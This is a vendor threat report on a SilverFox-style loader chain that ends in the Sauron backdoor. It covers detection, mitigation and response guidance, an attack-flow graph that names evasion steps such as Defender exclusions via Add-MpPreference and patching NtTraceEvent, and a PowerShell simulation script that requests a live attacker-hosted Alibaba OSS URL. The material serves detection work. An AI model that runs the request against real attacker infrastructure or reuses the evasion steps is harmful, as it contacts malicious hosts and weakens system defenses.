SilverFox-Style Loader Chain Uses Panasonic Shells, Alibaba OSS, and Sauron

SOC Prime Team

SilverFox-Style Loader Chain Uses Panasonic Shells, Alibaba OSS, and Sauron

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

This threat centers on a highly sophisticated multi-stage loader chain disguised as legitimate Panasonic software. The malware uses Alibaba OSS to deliver payloads and relies on image-based encrypted carriers that use a distinctive five-byte EOF trailer format. Its final stage deploys the Sauron backdoor, which maintains persistence through service creation and targeted registry changes.

Investigation

Analysts conducted both static and dynamic analysis and uncovered a sequence of side-loading operations involving binaries branded as Tencent and Philips software. The investigation exposed a layered decryption routine using incrementing XOR and RC4, along with scheduled task creation through RPC mechanisms. Memory forensics and sandbox telemetry helped reconstruct the full execution path, from the initial Panasonic-themed wrapper to the final Sauron backdoor.

Mitigation

Organizations should monitor for unauthorized RPC-based task scheduling and suspicious scheduled task creation through NdrClientCall3. Strong application allowlisting can help block execution of unapproved side-loaded DLLs. Defenders should also watch for unexpected deletion of volume shadow copies and suspicious registry modifications under HKCU\SOFTWARE.

Response

If this activity is detected, isolate affected systems immediately to stop further lateral movement or command-and-control communication. Conduct memory forensics to identify the injected modules and determine the current stage of the loader chain. Network logs should also be reviewed for traffic to Alibaba OSS infrastructure and the known command-and-control IP addresses identified during triage.

graph TB %% Class Definitions classDef action fill:#99ccff classDef malware fill:#ff9999 classDef tool fill:#cccccc classDef evasion fill:#ccffcc classDef persistence fill:#ffff99 %% Node Definitions %% Initial Access and Execution exec_user_malicious[“Action – User Execution: Malicious File File: ainstaller-86533005.exe Description: User executes trojanized executable disguised as Panasonic PC Notification software.”] class exec_user_malicious action %% Obfuscation and Masquerading obf_files[“Obfuscated Files or Information Technique: Multi-layer staged buffers Mechanism: Custom XOR/RC4 decoding Extraction: Five-byte EOF trailer from image carriers.”] class obf_files malware mask_file_type[“Masquerading: Masquerade File Type Description: Using image extensions (gif, jpg, png, db) to hide encrypted payloads.”] class mask_file_type evasion %% Proxy Execution proxy_sys_bin[“System Binary Proxy Execution Target 1: Tencent UxEnhanceHost loading UxEnhance64.dll Target 2: Philips/Speech Processing Solutions host loading XPSPLOG.dll”] class proxy_sys_bin action %% Persistence persist_sched_task[“Scheduled Task/Job: Scheduled Task Module: VirtuOne Mechanism: RPC calls to Task Scheduler via \\pipe\atsvc Goal: Create hidden repeating tasks.”] class persist_sched_task persistence %% Defense Evasion evade_def_impair[“Defense Impairment Action: Patching ntdll.dll!NtTraceEvent”] class evade_def_impair evasion evade_selective_excl[“Selective Exclusion Tool: PowerShell Command: Add-MpPreference -ExclusionPath Goal: Add Windows Defender exclusions.”] class evade_selective_excl evasion %% Final Stage proxy_rundll32[“System Binary Proxy Execution: Rundll32 File: rundll32.dat Export: Edge Action: Installs and starts malicious service.”] class proxy_rundll32 action malware_sauron[“Malware: Sauron Type: Malicious Service Capability: Persistent backdoor and command-launching.”] class malware_sauron malware %% Connections %% Flow of execution exec_user_malicious –>|triggers| obf_files obf_files –>|utilizes| mask_file_type mask_file_type –>|leads_to| proxy_sys_bin proxy_sys_bin –>|enables| persist_sched_task persist_sched_task –>|facilitates| evade_def_impair persist_sched_task –>|facilitates| evade_selective_excl evade_def_impair –>|prepares environment for| proxy_rundll32 evade_selective_excl –>|prepares environment for| proxy_rundll32 proxy_rundll32 –>|installs| malware_sauron

Attack Flow

Attack Narrative & Commands: The adversary seeks to download a second-stage payload using a legitimate cloud storage service to blend in with normal traffic. The attacker uses a PowerShell one-liner to simulate a loader making a request to a known SilverFox Alibaba OSS URL: https://jun616.oss-cn-beijing.aliyuncs.com/tad/payload.exe. This action is intended to bypass simple domain filters by leveraging the reputation of aliyuncs.com while using the specific malicious path defined in the detection rule.

Regression Test Script:

# Simulation of SilverFox Loader Network Indicator
# This script attempts to connect to the specific URL monitored by the Sigma rule.

$targetUrl = "https://jun616.oss-cn-beijing.aliyuncs.com/tad/test_file.txt"
Write-Host "[!] Simulating SilverFox network connection to: $targetUrl"

try {
    # Using Invoke-WebRequest to generate standard HTTP proxy telemetry
    $response = Invoke-WebRequest -Uri $targetUrl -Method Get -UseBasicParsing
    Write-Host "[+] Request completed. Status Code: $($response.StatusCode)"
}
catch {
    # We expect a 404 or connection error if the URL doesn't actually host a file, 
    # but the proxy log will still record the attempt.
    Write-Host "[-] Request attempted. Check proxy logs for the connection attempt."
}

Cleanup Commands:

# No persistent changes made by this simulation; no cleanup required.
Write-Host "[*] Simulation cleanup complete."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free